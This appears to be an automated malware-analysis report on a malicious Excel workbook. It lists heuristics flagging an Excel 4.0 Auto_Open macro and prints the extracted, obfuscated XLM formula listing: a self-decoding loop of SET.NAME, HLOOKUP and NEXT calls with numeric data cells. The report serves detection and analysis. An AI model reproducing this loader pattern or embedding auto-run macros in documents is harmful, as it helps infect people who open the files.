MALICIOUS
Risk Score: 140
Heuristics 3
- Excel 4.0 Auto_Open defined name (critical, OLE_XLM_AUTOOPEN_DEFINEDNAME): oletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
- XLM Auto_Open with dangerous formula APIs (critical, OLE_XLM_DANGEROUS_FN): Excel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and dangerous XLM formula APIs that can invoke programs, write files, or transfer control without VBA.
- Excel 4.0 (XLM) macro sheet present (medium, OLE_XLM_AUTOOPEN): Workbook contains an Excel 4.0 macro sheet sub-stream; XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| xlm_macros.txt | xlm-macro | oletools.olevba.extract_all_macros (XLM macro listing) | 6661 bytes |

SHA-256: b77083360d842f1d7f9ffea73c8da1d55b4567563df14bb8a66a3b1d0d03563a
Preview script
First 1,000 lines of the extracted script
' 0085 14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible - Sheet
' 0085 15 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible - UJuNJQ
' 0018 27 LABEL : Cell Value, String Constant - afwacKrUZmsn len=0
' 0018 23 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open len=7 ptgRef3d Sheet!E149
' 0018 25 LABEL : Cell Value, String Constant - elpeXzLdSS len=0
' 0018 20 LABEL : Cell Value, String Constant - HDwHj len=0
' 0018 24 LABEL : Cell Value, String Constant - HvswwfuhQ len=0
' 0018 20 LABEL : Cell Value, String Constant - mKoQT len=0
' 0018 21 LABEL : Cell Value, String Constant - mMXiVh len=0
' 0018 27 LABEL : Cell Value, String Constant - NkosEwxJTCSk len=0
' 0018 23 LABEL : Cell Value, String Constant - obDtjUFF len=0
' 0018 24 LABEL : Cell Value, String Constant - raosVDxst len=0
' 0018 20 LABEL : Cell Value, String Constant - rfILa len=0
' 0018 27 LABEL : Cell Value, String Constant - spLCawabegMr len=0
' 0018 23 LABEL : Cell Value, String Constant - sqrBbisA len=0
' 0018 24 LABEL : Cell Value, String Constant - TiEHVuiJZ len=0
' 0018 23 LABEL : Cell Value, String Constant - tMfvSyMb len=0
' 0018 22 LABEL : Cell Value, String Constant - TymtYfX len=0
' 0018 25 LABEL : Cell Value, String Constant - UaVcYHPTpP len=0
' 0018 22 LABEL : Cell Value, String Constant - uLFkZCy len=0
' 0018 22 LABEL : Cell Value, String Constant - VEMvIiX len=0
' 0018 27 LABEL : Cell Value, String Constant - VMKGvgywlERl len=0
' 0018 21 LABEL : Cell Value, String Constant - wZaQAO len=0
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' Sheet,Reference,Formula,Value
' UJuNJQ,E55,"SET.NAME("HvswwfuhQ",0+VALUE("0"))",""
' UJuNJQ,E57,"SET.NAME("HDwHj",HvswwfuhQ)",""
' UJuNJQ,E61,"SET.NAME("tMfvSyMb",HvswwfuhQ)",""
' UJuNJQ,E66,"SET.NAME("raosVDxst",COUNTA(mMXiVh))",""
' UJuNJQ,E69,"SET.NAME("afwacKrUZmsn",COUNTA(VMKGvgywlERl))",""
' UJuNJQ,E74,[],""
' UJuNJQ,E78,"SET.NAME("spLCawabegMr","")",""
' UJuNJQ,E83,"HDwHj",""
' UJuNJQ,R84,"",310.00000000000000000000
' UJuNJQ,R85,"",-157.00000000000000000000
' UJuNJQ,R86,"",872.00000000000000000000
' UJuNJQ,E87,"SET.NAME("rfILa",HLOOKUP("*",mMXiVh,HDwHj,FALSE))",""
' UJuNJQ,R87,"",215.00000000000000000000
' UJuNJQ,R88,"",-584.00000000000000000000
' UJuNJQ,R89,"",-354.00000000000000000000
' UJuNJQ,E91,"mKoQT",""
' UJuNJQ,E93,"SET.NAME("wZaQAO",HvswwfuhQ)",""
' UJuNJQ,E98,[],""
' UJuNJQ,E101,"wZaQAO",""
' UJuNJQ,E105,"TymtYfX",""
' UJuNJQ,E107,"NkosEwxJTCSk",""
' UJuNJQ,E110,"sqrBbisA",""
' UJuNJQ,E114,"SET.NAME("TiEHVuiJZ",VALUE(HLOOKUP("*",VMKGvgywlERl,sqrBbisA,FALSE)))",""
' UJuNJQ,E116,"VEMvIiX",""
' UJuNJQ,E121,"spLCawabegMr",""
' UJuNJQ,E126,"tMfvSyMb",""
' UJuNJQ,E129,NEXT(),""
' UJuNJQ,E132,"uLFkZCy",""
' UJuNJQ,E136,[],""
' UJuNJQ,E140,"elpeXzLdSS",""
' UJuNJQ,E142,NEXT(),""
' UJuNJQ,E145,RETURN(),""
' UJuNJQ,E179,"SET.NAME("UaVcYHPTpP",E55)",""
' UJuNJQ,E184,"mMXiVh",""
' UJuNJQ,E187,"SET.NAME("VMKGvgywlERl",R62C13)",""
' UJuNJQ,E189,"SET.NAME("elpeXzLdSS",196)",""
' UJuNJQ,E193,"SET.NAME("obDtjUFF",5)",""
' UJuNJQ,E195,UaVcYHPTpP(),""
' UJuNJQ,E196,HALT(),""